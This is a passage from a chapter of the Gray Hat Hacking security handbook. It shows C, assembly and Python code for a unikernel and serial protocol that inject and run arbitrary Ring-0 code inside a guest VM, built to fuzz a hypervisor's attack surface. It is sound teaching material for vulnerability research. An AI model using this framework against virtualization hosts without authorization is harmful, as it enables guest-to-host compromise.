28. J. Shan, X. Ding, and N. Gehani, “APLE: Addressing Lock Holder Preemption
    Problem with High Efficiency,” ieeexplore.ieee.org/document/7396163.
29. “Intel 64 and IA-32 Architectures Software Developer’s Manual, Volume 3:
    System Programming Guide,” op. cit.
30. ibid.
31. T. Merrifield and H. Taheri, “Performance Implications of Extended Page Tables
    on Virtualized x86 Processors,” dl.acm.org/doi/abs/10.1145/2892242.2892258.
32. “Intel 64 and IA-32 Architectures Software Developer’s Manual Volume 3:
    System Programming Guide,” op. cit.
33. ibid.
34. ibid.

                                                                                                        PART V
This page intentionally left blank
  Creating a Research
  Framework
                                                                            CHAPTER

                                                                                        24
  In this chapter, we cover the following topics:
      • How to explore hypervisor functionality exposed to guests
      • Development of a unikernel in C to execute arbitrary guest code
      • Development of Python scripts that send custom code to the unikernel for
        testing and fuzzing purposes

This chapter starts with a brief discussion of the hypervisor attack surface and then cov-
ers the development of a framework that we’ll use for vulnerability research purposes. To
follow along with the labs in this chapter, you’ll need an advanced level of knowledge of
the C and Python languages.
  The code from this chapter is available at the book’s GitHub repository:
$ git clone https://github.com/GrayHatHacking/GHHv6.git

  A Dockerfile provides the development environment needed to build and run the code:
$ cd GHHv6/ch24/
$ docker build -t kali .

   The hypervisor we will work with in this chapter is KVM (the default in Linux),
which needs to be installed in the host. To use it from the container, you must redirect
the /dev/kvm device, like so:
$ docker run --device=/dev/kvm -it kali bash

  Once inside the Docker container, you can find all the code in the /labs directory.

Hypervisor Attack Surface
In the previous chapter, you learned how instructions can be classified in different
groups: innocuous, sensitive, and so on. To explore most of the hypervisor-exposed func-
tionality, our focus should be on instructions that will trap into the VMM; as we already
know, most of them are privileged instructions. This means that we need to be capable

Gray Hat Hacking: The Ethical Hacker’s Handbook
              of executing arbitrary guest code at Ring-0. This is the initial access level we will assume
              for our research.
                  The virtualization stack is composed of multiple components, each running at differ-
              ent privilege levels. The impact of a vulnerability will depend on the affected component.
              In the best-case scenario, we can compromise the VMM (in VMX root-mode) directly
              from an unprivileged guest. Alternatively, we could aim for kernel-mode execution
              within the host or a privileged guest (root-partition/dom0), and in the worst case, we
              still have the user-mode stack. Components interact with each other, so compromising a
              less-privileged component can widen the attack surface, which can be further exploited
              in a bug-chain across more privileged components.
                  The following illustrations are an overview of the attack surface exposed by the differ-
              ent components of a Type-2 hypervisor and a Type-1 hypervisor.

                                         Host OS kernel             Worker process      guest VM

                                          VMM drivers                User process

                                        Most privileged                              Least privileged

                                                           Root-partition/dom0 VM
                                VMM                 OS kernel               Worker process       guest VM

                                                  Backend drivers            User process

                          Most privileged                                                     Least privileged

                 In general (for modern, hardware-assisted hypervisors), our starting point to explore
              the attack surface will be to look at the conditions that cause the different exit-reason
              codes. Upon a VM-Exit, the CPU resumes execution in VMX root-mode from the
              instruction pointer stored in the virtual machine control structure (VMCS) host-state
              area. This points to hypervisor code that (after saving some state) checks the VMCS exit-
              reason field and decides what action(s) to take.
                 We can find a list of definitions for possible exit-reasons in the Linux kernel sources:
              https://github.com/torvalds/linux/blob/master/tools/arch/x86/include/uapi/asm/vmx.h.
                 Some of these exit conditions are out of our reach (either caused by external events
              or not available depending on specific CPU features or the VMCS configuration), but
              many of them can be triggered by executing specific instructions in the guest.

                                 NOTE Near the end of this chapter we will write a couple fuzzers that explore
                                 EXIT_REASON_IO_INSTRUCTION, EXIT_REASON_MSR_READ, and
                                 EXIT_REASON_MSR_WRITE.
                                                                     Chapter 24: Creating a Research Framework
   Aside from VM-Exit conditions, the attack surface can be also exposed by communica-
tion mechanisms based on shared memory—for example, direct memory access (DMA)
in emulated hardware devices, or buffers used by VMBus1 or VIRTIO.2 Unfortunately,
we won’t cover this topic in this chapter.
   Finally, hypervisors not relying on hardware-assisted virtualization expose a larger
attack surface, but these are not common targets nowadays.

The Unikernel
As mentioned previously, we need to be capable of executing arbitrary Ring-0 code from
a guest VM. One way to do this is implementing a kernel driver to execute arbitrary code
in a general-purpose OS deployed in the VM. This approach has a couple problems,
though. First, a full OS is slow and bloated. Second, nondeterminism is introduced to
our testing environment by the multiple tasks that execute concurrently. To avoid these
issues, we will implement our own unikernel3 with the following requirements:

   • Simplicity It should have a small footprint and be efficient.
   • Fast (re)booting It is common to reach an unrecoverable state, so we must reboot.
   • Resilience The kernel has to try to recover from an invalid state and keep
     running as long as possible. When this is not possible, we need to reboot.
   • Determinism Achieving complete determinism is not possible, but we need
     to get as close as possible. This is important for bug reproduction and fuzz-case
     minimization purposes.
   • Portability It should run on most hypervisor implementations without major
     modifications.

                                                                                                                 PART V
   Our unikernel will communicate with external tools, enabling them to inject and
execute arbitrary code in the VM at Ring-0. We must be able to collect execution results
and send them back to the tools. In the following sections, we cover the development
process of this kernel.

Lab 24-1: Booting and Communication

To boot our kernel, we will use GRUB to avoid the trouble of writing our own boot-
loader. Typically, hypervisors support BIOS booting and/or UEFI. Fortunately, the grub-
mkrescue4 tool allows us to generate ISO media to boot from both.
   Our kernel image will be an ELF file, with a Multiboot25 header placed at the start of
the code section. When GRUB boots the image, the environment it leaves us in is 32-bit
protected-mode; we want to use all the available processor features, so we must switch
to long-mode.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                Let’s begin our implementation with some bootstrap code that emits the Multiboot2
              header and then switches to long-mode:
              ;; bootstrap.asm
              extern kmain
              global _start
              [bits 32]
              [section .bss]
              align 0x1000
              resb 0x2000
              stack_top:
              pd: resb 0x1000 * 4 ; 4 PDs = maps 4GB
              pdpt: resb 0x1000    ; 1 PDPT
              pml4: resb 0x1000    ; 1 PML
              [section .data]
              gdt:                   ; minimal 64-bit GDT
              dq 0x0000000000000000
              dq 0x00A09b000000ffff ; kernel CS
              dq 0x00C093000000ffff ; kernel DS
              gdt_end:               ; TODO: TSS
              gdtr:
              dw gdt_end - gdt - 1 ; GDT limit
              dq gdt                 ; GDT base
              [section .text]
              align 8, db 0
              ;; multiboot2 header
              mb_header_size equ (mb_header_end - mb_header)
              mb_header:❶
              dd 0xE85250D6     ; magic field
              dd 0              ; architecture field: i386 32-bit protected-mode
              dd mb_header_size ; header length field
              dd 0xffffffff & -(0xE85250D6 + mb_header_size) ; checksum field
              ;; termination tag
              dw 0 ; tag type
              dw 0 ; tag flags
              dd 8 ; tag size
              mb_header_end:
              ;; kernel code starts here
              _start:❷
              mov esp, stack_top
              mov edi, pd
              mov ecx, 512*4
              mov eax, 0x87
              init_pde:❸
              mov dword [edi], eax
              add eax, 0x200000
              add edi, 8
              dec ecx
              jnz init_pde
              mov dword [pdpt], pd + 7
              mov dword [pdpt+0x08], pd + 0x1007
              mov dword [pdpt+0x10], pd + 0x2007
              mov dword [pdpt+0x18], pd + 0x3007
              mov eax, pml4
              mov dword [eax], pdpt + 7
              mov cr3, eax         ; load page-tables
              mov ecx, 0xC0000080
              rdmsr
              or eax, 0x101        ; LME | SCE
              wrmsr❹              ; set EFER
              lgdt [gdtr]❺        ; load 64-bit GDT
              mov eax, 0x1ba       ; PVI | DE | PSE | PAE | PGE | PCE
                                                                       Chapter 24: Creating a Research Framework
mov cr4, eax
mov eax, 0x8000003b ; PG | PE | MP | TS | ET | NE
mov cr0, eax❻
jmp 0x08:code64❼
[bits 64]
code64:
mov ax, 0x10
mov ds, ax
mov es, ax
mov ss, ax
call kmain

   The .text section begins with the directives to emit a minimal Multiboot2 header ❶.
At the entry point ❷, an 8KB stack is set, and a 1:1 mapping of the first 4GB of memory
is created ❸. The subsequent steps involve setting the Long Mode Enable flag in the
EFER register ❹, loading a 64-bit GDT ❺, enabling paging ❻, and jumping into long-
mode ❼. The code ends with a call to the not-yet-implemented function kmain.
   For communication between our kernel and the outside world, we can use a simple and
widely available device: the serial port. Most hypervisors implement serial port emulation,
and they usually allow it to be forwarded to IPC mechanisms in the host, such as sockets
or pipes. Let’s get “hands on” and add some basic serial port support to our kernel:
/* common.c */
static uint16_t SerialPort = 0x3f8; /* TODO: set it dynamically */
static void outb(uint16_t port, uint8_t val) {
    __asm__ __volatile__("outb %0, %1" :: "a"(val), "Nd"(port));❶
}
static uint8_t inb(uint16_t port) {
    uint8_t ret;
    __asm__ __volatile__("inb %1, %0" : "=a"(ret) : "Nd"(port));❷
    return ret;
}

                                                                                                                   PART V
void setup_serial() {❸
    outb(SerialPort + 1, 0x00); /* disable interrupts */
    outb(SerialPort + 3, 0x80); /* enable DLAB */
    outb(SerialPort + 0, 0x01); /* divisor low=1(115200 baud) */
    outb(SerialPort + 1, 0x00); /* divisor high=0 */
    outb(SerialPort + 3, 0x03); /* 8-bit, no parity, 1 stop bit */
    outb(SerialPort + 2, 0xC7); /* FIFO, clear, 14-byte threshold */
    outb(SerialPort + 4, 0x03); /* DTR/RTS */
}
void write_serial(const void *data, unsigned long len) {❹
    const uint8_t *ptr = data;
    while (len) {
        if (!(inb(SerialPort + 5) & 0x20))
            continue;
        len -= 1;
        outb(SerialPort, *ptr++);
    }
}
void read_serial(void *data, unsigned long len) {❺
    uint8_t *ptr = data;
    while (len) {
        if (!(inb(SerialPort + 5) & 1))
            continue; /* TODO: yield CPU */
        len -= 1;
        *ptr++ = inb(SerialPort);
    }
}
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 First, we write a couple of wrappers, for OUTB ❶ and INB ❷, needed by the rest
              of the code. The setup_serial ❸ function can be used to initialize the serial port at a
              typical baud speed of 115200. We implement write_serial ❹ to transmit a data stream
              from memory, and we implement read_serial ❺ to receive it. Our implementation has
              some deficiencies, such as the spin-wait for the serial port to be ready, but let’s keep
              things simple.
                 Now we can implement kmain to test our kernel:
              /* main.c */
              void kmain() {
                  setup_serial();
                  write_serial("Hello world!", 12);
                  __asm__ __volatile__("hlt");
              }

                After building the kernel, we will conduct our testing in QEMU/KVM. If everything
              goes well, we should see a “Hello world!” message:
              ┌──(root ghh6)-[/labs/lab1]
              └─# make
              … omitted for brevity …
              ┌──(root ghh6)-[/labs/lab1]
              └─# qemu-system-x86_64 -display none -boot d -cdrom kernel_bios.iso -m 300M
              -serial stdio -enable-kvm
              Hello world!

              Lab 24-2: Communication Protocol

              Now we can start working on the protocol to communicate with external tools (from
              now we will refer to them as clients). Let’s start with a brief discussion of the protocol
              requirements:

                    • The kernel must process requests from the client to store and execute arbitrary
                      code.
                    • The kernel must send a response with results from the execution of arbitrary code.
                    • Communication is initiated by the kernel. It must let the client know that
                      it is ready to process requests, and it should provide information about its
                      execution environment.
                    • The kernel can send out-of-band (OOB) messages for debugging purposes.
                    • A message’s integrity must be verified.
                 Based on these requirements, we will denote the following message types: request,
              reply, boot messages, and OOB messages. Messages will be composed of a fixed-
              sized header and a variable-sized body. The header will indicate the type of message
                                                                       Chapter 24: Creating a Research Framework
and body length, and it will include integrity checksums for the message’s body and
header itself:
/* protocol.h */
typedef enum {
    MTBoot = UINT32_C(0), MTRequest, MTReply, MTOOB, MTMax = MTOOB
} MT;❶
#define MAX_MSGSZ UINT32_C(0x400000) /* 4MB */
typedef struct {
    MT type;
    uint32_t len;❷
    uint32_t checksum;❸ /* body CRC32 */
    uint32_t hdr_csum;❹ /* header CRC32 */
} __attribute__((packed)) MsgHdr;

    The MT ❶ enumeration represents the different message types that can be encoded
in the type field of the message’s header. The rest of the header contains the length ❷,
in bytes, of the body (less than MAX_MSGSZ), the checksum of the body’s contents ❸,
and the checksum of the header’s contents, excluding the contents of the hdr_csum field
itself ❹.
    The format of a message’s body has to be flexible enough to encode the most common
data structures, while at the same time, the serialization and deserialization processes
have to be kept simple. It needs to be easy to produce data from arbitrary code, and it
should be easy for a client to consume and work with this data, too. To fulfill those needs,
we will define an encoding that encompasses values of the following types: integers,
arrays, strings, and lists.
typedef enum {
    /* primitive sizes encoded in LSB */
    UInt8 = UINT32_C(0x001), UInt16 = UINT32_C(0x002),

                                                                                                                   PART V
    UInt32 = UINT32_C(0x004), UInt64 = UINT32_C(0x008),
    Int8 = UINT32_C(0x101), Int16 = UINT32_C(0x102),
    Int32 = UINT32_C(0x104), Int64 = UINT32_C(0x108),
    PrimitiveMax = Int64,❸
    /* Compound types */
    Array = UINT32_C(0x400),❹
    CString = UINT32_C(0x500),❺
    List = UINT32_C(0x600),❻
    Nil = UINT32_C(0x700)❼
} TP;❶
typedef union {
    uint8_t u8; uint16_t u16; uint32_t u32; uint64_t u64;
    int8_t i8; int16_t i16; int32_t i32; int64_t i64;
} Primitive_t;❷

   Every value starts with a 32-bit prefix defined in the TP ❶ enumeration. Primitives
can be any of the integer types defined in the Primitive_t ❷ union. These are encoded
as a TP prefix (below or equal to PrimitiveMax ❸), followed by the value in its native
encoding. Compound types can be arrays, strings, and lists.
   Arrays start with the Array ❹ prefix followed by an Array_t header:
typedef struct {
    uint32_t count;
    TP subtype;
} __attribute__((packed)) Array_t;
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 This header indicates the number of elements and their subtype, which is constrained
              to primitive types. After the header are the elements’ values in their native encoding.
                 Strings are composed of a CString ❺ prefix, followed by a variable number of non-
              null bytes and delimited by a null byte suffix.
                 Lists start with a List ❻ prefix followed by a variable number of nodes. Each node is
              a pair where its first element can be any TP-prefixed value (including other lists) and its
              second element is the next node of the list. A node prefixed with Nil ❼ indicates the end
              of the list.
                 With the message’s definitions in place, we can start working on the implementation:
              /* protocol.c */
              struct msg_buffer {
                  unsigned int offset;
                  uint8_t buf[MAX_MSGSZ];
              };
              static struct msg_buffer send_buf;❶
              static struct msg_buffer oob_buf;❸
              static struct msg_buffer recv_buf;❷

              #define PUT(b, v) ({                                          \
                  typeof((typeof(v))v) tmp;❹                               \
                  unsigned int new_offset = b->offset + sizeof(v);          \
                  assert(new_offset > b->offset && MAX_MSGSZ > new_offset); \
                  *(typeof(tmp) *)&b->buf[b->offset] = v;❺                 \
                  b->offset = new_offset;                                   \
              })
              #define GET(v) ({                                                   \
                  unsigned int new_offset = recv_buf.offset + sizeof(v);          \
                  assert(new_offset > recv_buf.offset && MAX_MSGSZ > new_offset); \
                  v = *(typeof(v) *)&recv_buf.buf[recv_buf.offset];               \
                  recv_buf.offset = new_offset;                                   \
              })

                  First, we need a buffer (send_buf ❶) to construct the message’s body before sending it,
              and we need one for incoming messages ❷. We also define an extra buffer ❸ exclusively
              for OOB messages, so if we send debug messages in the middle of constructing a message,
              we don’t trash the contents of send_buf.
                  We define a couple macros to copy data to and from the buffers: GET copies a value
              from the receive buffer, while PUT copies a value to the target buffer indicated by its first
              parameter (we will pass either send_buf or oob_buf). The PUT macro takes a few extra
              steps involving the double use of typeof to define the tmp ❹ variable. Note that typeof
              accepts either a variable or an expression at the outer typeof. We use the latter: a cast of
              the variable to its own type. The reason is that the result of an expression is an rvalue, so
              if the original variable has a const qualifier, it will get dropped. This way, assignment at
              ❺ will type-check when we pass a const variable to PUT.
                  Now we can start writing “put” and “get” functions for each of the TP values we
              defined:
              void put_tp(bool is_oob, TP prefix) {
                  struct msg_buffer *buf = is_oob ? &oob_buf : &send_buf;
                  PUT(buf, prefix);
              }
                                                                   Chapter 24: Creating a Research Framework
void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
    struct msg_buffer *buf = is_oob ? &oob_buf : &send_buf;
    assert(PrimitiveMax >= prefix);
    put_tp(is_oob, prefix);
    switch (prefix) {
        case UInt8:
            PUT(buf, value->u8); break;
        case UInt16:
            PUT(buf, value->u16); break;
… omitted for brevity …
        case Int64:
            PUT(buf, value->i64); break;
    }
}
void put_array(bool is_oob, const Array_t *array, const void *data) {
    struct msg_buffer *buf = is_oob ? &oob_buf : &send_buf;
    uint32_t len = 0;
    put_tp(is_oob, Array);
    PUT(buf, *array);
    while (array->count * (array->subtype & 0xff) != len)
        PUT(buf, ((const char *)data)[len++]);
}
void put_cstring(bool is_oob, const char *ptr) {
    struct msg_buffer *buf = is_oob ? &oob_buf : &send_buf;
    put_tp(is_oob, CString);
    do { PUT(buf, *ptr); } while (*ptr++ != '\0');
}
static void _put_va(bool is_oob, TP prefix, va_list args) {
    if (PrimitiveMax >= prefix) {
        Primitive_t value = va_arg(args, Primitive_t);
        put_primitive(is_oob, prefix, &value);
    }
    if (List == prefix) {
        put_tp(is_oob, prefix);
        do {

                                                                                                               PART V
            prefix = va_arg(args, TP);
            _put_va(is_oob, prefix, args);
        } while (Nil != prefix);
        put_tp(is_oob, prefix);
    }
    if (Array == prefix) {
        Array_t *a = va_arg(args, Array_t *);
        put_array(is_oob, a, va_arg(args, const void *));
    }
    if (CString == prefix)
        put_cstring(is_oob, va_arg(args, const char *));
}
void put_va(bool is_oob, ...) {❶
    va_list ap;
    va_start(ap, is_oob);
    TP prefix = va_arg(ap, TP);
    _put_va(is_oob, prefix, ap);
    va_end(ap);
}

           NOTE The “get” functions were omitted from the code listing for brevity
           reasons.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 The first argument for all the “put” functions indicates whether the data should be
              written to send_buf or to oob_buf. Data is encoded following the schema described
              when defining the different TP values. For convenience, we also implemented a variadic
              function ❶ that combines multiple values of different types into a single call.
                 Now, we need the functions to send and receive messages:
              void send_msg(MT msg_type) {❶
                  struct msg_buffer *buf = (MTOOB == msg_type) ? &oob_buf : &send_buf;
                  MsgHdr hdr = {
                      .type = msg_type, .len = buf->offset,
                      .checksum = crc32(buf->buf, buf->offset), .hdr_csum = 0
                  };
                  hdr.hdr_csum = crc32(&hdr, sizeof(hdr) - sizeof(hdr.hdr_csum));
                  write_serial(&hdr, sizeof(hdr));
                  write_serial(buf->buf, buf->offset);
                  buf->offset = 0;
              }
              static bool msg_hdr_valid(const MsgHdr *hdr) {
                  return MTRequest == hdr->type && MAX_MSGSZ > hdr->len &&
                      crc32(hdr, sizeof(*hdr) - sizeof(hdr->hdr_csum)) == hdr->hdr_csum;
              }
              void recv_msg() {❷
                  MsgHdr hdr;
                  read_serial(&hdr, sizeof(hdr));
                  assert(msg_hdr_valid(&hdr));
                  recv_buf.offset = 0;
                  read_serial(recv_buf.buf, hdr.len);
                  assert(crc32(recv_buf.buf, hdr.len) == hdr.checksum);
              }

                  The send_msg ❶ function takes the message’s type as an argument that is first used
              to select the right buffer to read the message’s body. It calculates the body and header’s
              checksums (crc32) and sends the message over the serial port. Lastly, it resets the buffer
              offset so the next message can be constructed.
                  To get a message, recv_msg ❷ reads the message’s header from the serial port. Before
              going further, it performs validation checks on the header’s type, length, and checksum
              fields. Once these checks are passed, it reads the message’s body and validates its check-
              sum. We assume that the client will never send malformed messages, so if a validation
              check fails, it is a consequence of kernel state corruption, which is an unrecoverable
              condition, and we must reboot.

                                 NOTE The code listings for the crc32 and assert functions were omitted
                                 for brevity reasons. The crc32 function implements CRC32-C (polynomial
                                 0x11EDC6F41), while the assert implementation sends an OOB message
                                 and hard-resets by triple-faulting.

                  Let’s test the protocol implementation by constructing and sending an OOB message:
              /* protocol.h */
              typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;❶
              #define LIST(...) List, __VA_ARGS__, Nil
              #define PUT_LIST(is_oob, ...) (put_va(is_oob, LIST(__VA_ARGS__)))
              #define OOB_PRINT(fmt, ...) ({❷                                 \
                  PUT_LIST(true, UInt32, OOBPrint, CString, fmt, __VA_ARGS__); \
                  send_msg(MTOOB);                                             \
              })
                                                                      Chapter 24: Creating a Research Framework
   The OOBType ❶ enumeration defines two types of OOB messages: OOBPrint and
OOBAssert. The body of an OOB message is a List, where the first element is the
OOBType. The OOB_PRINT ❷ macro builds this list over the arguments passed to it,
prepending the OOBPrint value, and adding the CString prefix to the first argument
that corresponds to a format string. Finally, the macro sends the OOB message over the
serial port. Note that this macro can’t infer types from the format string, so we have to
pass the TP values as arguments.
   We can now replace our “Hello world” message by a call to OOB_PRINT:
/* main.c */
void kmain() {
    setup_serial();
    OOB_PRINT("kmain at 0x%016lx", UInt64, &kmain);
    __asm__ __volatile__("hlt");
}

   Let’s take a look at the message’s data by redirecting the output to hexdump (don’t
forget to run make to build the kernel in each lab):
┌──(root ghh6)-[/labs/lab2]
└─# qemu-system-x86_64 -display none -boot d -cdrom kernel_bios.iso -m 300M
-serial stdio -enable-kvm | stdbuf -o0 hexdump -C | cut -d' ' -f3-
03 00 00 00 32 00 00 00 2f c9 e1 6a 3a 37 16 e8 |....2.../..j:7..|
00 06 00 00 04 00 00 00 00 00 00 00 00 05 00 00 |................|
6b 6d 61 69 6e 20 61 74 20 30 78 25 30 31 36 6c |kmain at 0x%016l|
78 00 08 00 00 00 35 14 40 00 00 00 00 00 00 07 |x.....5.@.......|

    An obvious fact we can see from this output is that OOB_PRINT doesn’t perform
string formatting. Our kernel won’t do any work that could be done by the client!

                                                                                                                  PART V
Boot Message Implementation
One of our protocol requirements is that communication has to be initiated by the kernel,
sending information about its execution environment to the client. We will fulfill this
requirement by implementing a “boot message” that provides the following information:

   • Physical address space (from the point of view of the kernel running in a VM).
   • Kernel addresses (symbols). This serves two purposes. The first is to let the
     client know where the kernel is loaded so it won’t overwrite it accidentally when
     injecting code. The second is to provide addresses of known kernel functions that
     can be used by external code.

   The boot message’s information will be encoded in an associative list, where the first
element of every pair is an identification string for the contents of the second element.
The layout of the second element is specific to the kind of information provided (gener-
ally encoded as a sub-list). In this case, we will use the strings “symbols” and “mmap” to
tag information.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Constructing the “symbols” is straightforward; we just make them an associative list
              of symbol names and their addresses:
              #define NAMED(n, t, v) LIST(CString, n, t, v)
              #define SYMBOL(n) NAMED(#n, UInt64, &n)
              extern char __ehdr_start, _end;
              static void put_symbols() {
                  PUT_LIST(false, CString, "symbols",
                          LIST(SYMBOL(__ehdr_start), SYMBOL(_end),
                               SYMBOL(put_va), SYMBOL(send_msg)));
              }

                 In this case, we provide the addresses of the kernel’s ELF header, the end of the BSS
              segment, and the put_va and send_msg functions.
                 To construct the “mmap,” we will modify the bootstrap code to take advantage of the
              multiboot info (MBI) area provided by GRUB:
              [bits 64]
              code64:
              … omitted for brevity …
              mov rdi, rbx        ; MULTIBOOT_MBI_REGISTER
              call kmain

                The kmain definition has to be adapted to take the MBI as an argument. We will also
              add the code that constructs and sends the boot message:
              void kmain(const void *mbi) {
                  setup_serial();
                  OOB_PRINT("kmain at 0x%016lx", UInt64, &kmain);
                  put_tp(false, List);
                  put_symbols();
                  put_mbi(mbi);
                  put_tp(false, Nil);
                  send_msg(MTBoot);

                  The last piece is the put_mbi function to parse the MBI and construct the “mmap”:
              #include "multiboot2.h"
              #define PTR_ADD(a, s) ((typeof(a))((unsigned long)a + s))
              #define ALIGN_UP(a, s) ((a + (typeof(a))s - 1) & ~((typeof(a))s - 1))

              static void put_mmap(const struct multiboot_tag_mmap *mmap) {❸
                  const struct multiboot_mmap_entry *entry, *end;
                  end = PTR_ADD(&mmap->entries[0], mmap->size - sizeof(*mmap));
                  put_tp(false, List);
                  for (entry = &mmap->entries[0]; entry != end;
                      entry = PTR_ADD(entry, mmap->entry_size))
                      PUT_LIST(false,
                          NAMED("address", UInt64, entry->addr),
                          NAMED("length", UInt64, entry->len),
                          NAMED("type", UInt32, entry->type));
                  put_tp(false, Nil);
              }
              static void put_mbi(const void *mbi) {❶
                  const struct multiboot_tag *tag;
                  for (tag = PTR_ADD(mbi, ALIGN_UP(sizeof(uint64_t), MULTIBOOT_TAG_ALIGN));
                                                                         Chapter 24: Creating a Research Framework
         tag->type != MULTIBOOT_TAG_TYPE_END;
         tag = PTR_ADD(tag, ALIGN_UP(tag->size, MULTIBOOT_TAG_ALIGN))) {
         switch (tag->type) {
             case MULTIBOOT_TAG_TYPE_MMAP: ❷
                 put_tp(false, List);
                 put_cstring(false, "mmap");
                 put_mmap((const struct multiboot_tag_mmap *)tag);
                 put_tp(false, Nil);
                 break;
             /* TODO: handle other tags */
             default: break;
         }
    }
}

             NOTE To walk the MBI, we need definitions from the “multiboot2.h” file
             provided by GRUB.

   The put_mbi ❶ function searches for the MULTIBOOT_TAG_TYPE_MMAP ❷
in the MBI to find the multiboot_tag_mmap structure. This structure contains the
address space information in a series of entries iterated by put_mmap ❸ to produce the
“mmap.” Each of these entries represents a memory range and contains its base address,
length, and memory type.
   So far, this is all we need for the boot message. An advantage of this layout is that we
could add extra information without introducing breaking changes.

Handling Requests

                                                                                                                     PART V
Executing arbitrary code involves two operations: writing binary code into the guest’s
memory and redirecting execution flow to this memory area. We will define a request as
a list of operations of any of these two kinds. The kernel will process a request by iterating
this list and applying every operation sequentially.
typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;

   Every operation takes two or more elements from the list: an OpType and the opera-
tion parameters.
static void op_write() {❸
    Primitive_t addr;
    Array_t array;
    uint8_t *payload;
    get_va(UInt64, &addr);
    get_va(Array, &array, &payload);
    for (uint32_t x = 0; x != array.count * (array.subtype & 0xff); x += 1)
        ((uint8_t *)addr.u64)[x] = payload[x];
}
static void op_exec() {❹
    Primitive_t addr;
    get_va(UInt64, &addr);
    ((void (*)())addr.u64)();
Gray Hat Hacking: The Ethical Hacker’s Handbook
              }
              void kmain(const void *mbi) {
              … omitted for brevity …
                  send_msg(MTBoot);
                  while (1) {
                      recv_msg();
                      assert(List == get_tp());❶
                      for (TP prefix = get_tp(); Nil != prefix; prefix = get_tp()) {
                          Primitive_t op_type;
                          assert(UInt32 == prefix); /* requests must start with ReqType */
                          get_primitive(prefix, &op_type);
                          assert(OpWrite == op_type.u32 || OpExec == op_type.u32);❷
                          if (OpWrite == op_type.u32)
                              op_write();
                          if (OpExec == op_type.u32)
                              op_exec();
                      }
                  }
              }

                 After initiating communication, we start receiving requests containing a list of opera-
              tions. It is important to note that we don’t make distinctions between debug and release
              builds, so the expressions inside assert ❶ are always executed. We start processing the list
              elements, verifying that they start with a UInt32 containing a valid OpType ❷.
                 If it is an OpWrite operation, op_write ❸ is called. This function consumes two
              more elements from the list: a UInt64 memory address and an Array. Then it copies
              the contents of the array to the memory address.
                 For OpExec operations, op_exec ❹ is called. This function consumes a UInt64
              element from the list. The value from this element is cast to a function pointer and
              gets called.
                 When either function returns, the loop consumes the next operation, and so on, until
              the end of the list.

              The Client (Python)
              A client is an application running outside the VM that interacts with the kernel by
              sending requests containing binary code generated for specific purposes. This code is
              executed by the kernel, and results are sent back to the application for further processing.
              Clients can differ in the kind of code they generate, but they must all follow the same
              communication protocol. In this section, we will implement all this functionality using
              the Python language.

              Communication Protocol (Python)
              For the protocol implementation, we will use Construct,6 a Python module for writing
              binary parsers. Rather than using a series of pack/unpack calls, Construct enables us to
              write code in declarative style, which in general leads to a more concise implementation.
              Other modules we will import are fixedint,7 to replace Python’s “bignum” integer type,
              and crc32c,8 to use the same CRC32-C implementation as the kernel.
                                                                        Chapter 24: Creating a Research Framework
             TIP Before going further, it is recommended that you read Construct’s
             documentation to get familiar with it.

  Let’s begin by defining the message header:
# protocol.py
import construct as c
import fixedint as f
from crc32c import crc32c
MT = c.Enum(c.Int32ul, Boot=0, Request=1, Reply=2, OOB=3)
MAX_MSGSZ = 0x400000
MsgHdr = c.Struct(
    'hdr' / c.RawCopy(❶
        c.Struct(
            'type'        / MT,
            'len'         / c.ExprValidator(c.Int32ul, c.obj_ <= MAX_MSGSZ),
            '_csum_offset'/ c.Tell,❸
            'checksum'    / c.Int32ul❹
        )
    ),
    'hdr_csum' / c.Checksum(c.Int32ul, crc32c, c.this.hdr.data)❷
)

    This code looks similar to its C counterpart, but in this case, we separated the hdr_csum
field from the rest of the header, which is wrapped with RawCopy ❶ to access it as a binary
blob via c.this.hdr.data. This way, we can compute its CRC32-C ❷.
    Another important distinction is the introduction of a synthetic field called
_csum_offset ❸, which is used to store the current stream position. Later on, we will
use this field to access the checksum ❹ field when computing the CRC32-C of the
message’s body.

                                                                                                                    PART V
    Following the same order as the C implementation, we will define TP values and
primitives (integers):
TP = c.Enum(c.Int32ul,
    UInt8=0x001, UInt16=0x002, UInt32=0x004, UInt64=0x008,
    Int8=0x101, Int16=0x102, Int32=0x104, Int64=0x108,
    Array=0x400, CString=0x500, List=0x600, Nil=0x700
)
IntPrefixes = (❶
    TP.UInt8, TP.UInt16, TP.UInt32, TP.UInt64,
    TP.Int8, TP.Int16, TP.Int32, TP.Int64
)
IntConstructs = (❷
    c.Int8ul, c.Int16ul, c.Int32ul, c.Int64ul,
    c.Int8sl, c.Int16sl, c.Int32sl, c.Int64sl
)
IntFixed = (
    f.UInt8, f.UInt16, f.UInt32, f.UInt64, f.Int8, f.Int16, f.Int32, f.Int64
)
def make_adapter(cInt, fInt):
    return c.ExprSymmetricAdapter(cInt, lambda obj, _: fInt(obj))

IntAdapters = (❸
    make_adapter(cInt, fInt) for cInt, fInt in zip(IntConstructs, IntFixed)
)
IntAlist = list(zip(IntPrefixes, IntAdapters))❹
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 IntPrefixes ❶ is the group of TP values corresponding to primitive types, and
              IntConstructs ❷ is its associated group of constructs. Instead of using Python’s big-
              num integers, we want to work with fixed-sized values. For this purpose, we created
              a list of adapters called IntAdapters ❸. Finally, we map TP values to their respective
              adapters in IntAlist ❹.
                 Compound types require more work, mostly due to the implementation of adapters
              to convert them to standard collections:
              class ArrayAdapter(c.Adapter):❸
                  def _decode(self, obj, context, path):
                      subtype = dict(zip(IntPrefixes, IntFixed))[obj.subtype]
                      return tuple(subtype(x) for x in obj.v)

                     def _encode(self, obj, context, path):
                         subtype = dict(zip(IntFixed, IntPrefixes))[type(obj[0])]
                         return {'count': len(obj), 'subtype': subtype, 'v': obj}

              class ListAdapter(c.Adapter):❽
                  def _decode(self, obj, context, path):
                      ret = []
                      while obj.head != None:
                          ret.append(obj.head)
                          obj = obj.tail
                      return ret

                     def _encode(self, obj, context, path):
                         xs = {'head': None, 'tail': None}
                         for x in reversed(obj):
                             xs = {'head': x, 'tail': xs}
                         return xs

              List = c.Struct(❻
                  'head' / c.LazyBound(lambda: Body),
